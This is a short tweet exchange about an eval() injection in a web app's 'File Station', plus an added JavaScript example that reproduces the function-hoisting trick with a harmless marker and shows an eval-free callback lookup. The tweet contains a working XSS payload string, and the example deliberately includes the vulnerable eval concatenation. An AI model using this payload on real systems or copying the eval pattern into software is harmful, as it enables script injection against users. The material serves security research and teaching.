Things I did as an intern two summers ago
https://twitter.com/NCCsecurityUS/status/849971823618007040 …
Replying to @jnollz
Re the eval() in File Station: Was it in top-level context?
If so, eval('callback = window.opener.' + 'a; function opener(){}; alert("xss")') might work?
(The definition of "opener" gets hoisted, so by the time "window.opener" is evaluated, it evaluates to the function, avoiding the error.)
8:18 PM - 11 Apr 2017
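Added example, not part of the original thread or of any vendor code: it reproduces the hoisting behaviour described above under Node and contrasts it with an eval-free callback lookup. The `window` stand-in, the `hits` marker (in place of `alert`), and the helpers `evalTopLevel`, `evalInFunction` and `resolveCallback` are assumptions made for illustration.

```javascript
// Stand-ins for a popup window with no opener (assumption: run under Node).
globalThis.window = globalThis;
globalThis.hits = [];            // benign marker in place of alert("xss")
globalThis.callback = undefined;

// Constructed input modelled on the string quoted in the thread.
const SUFFIX = 'a; function opener(){}; hits.push("ran")';

function reset() {
  globalThis.opener = null;      // window.opener is null without an opener
  globalThis.hits.length = 0;
}

// Vulnerable pattern, global code: indirect eval behaves like a top-level eval.
function evalTopLevel(suffix) {
  reset();
  try {
    (0, eval)('callback = window.opener.' + suffix);
    return globalThis.hits.length ? 'ran' : 'no-op';
  } catch (e) { return e.name; }
}

// Same pattern inside a function: the hoisted declaration is local to this scope.
function evalInFunction(suffix) {
  reset();
  try {
    eval('callback = window.opener.' + suffix);
    return globalThis.hits.length ? 'ran' : 'no-op';
  } catch (e) { return e.name; }
}

// Eval-free lookup (hypothetical fix): identifier allow-list, own properties only.
function resolveCallback(name, opener) {
  if (!/^[A-Za-z_$][\w$]*$/.test(name)) throw new TypeError('bad callback name');
  if (opener === null || !Object.prototype.hasOwnProperty.call(opener, name)) return null;
  return typeof opener[name] === 'function' ? opener[name] : null;
}
```

In global code the hoisted declaration replaces `opener` on the global object before the property read, so the null dereference never happens; inside a function the declaration stays local and `window.opener` is still null.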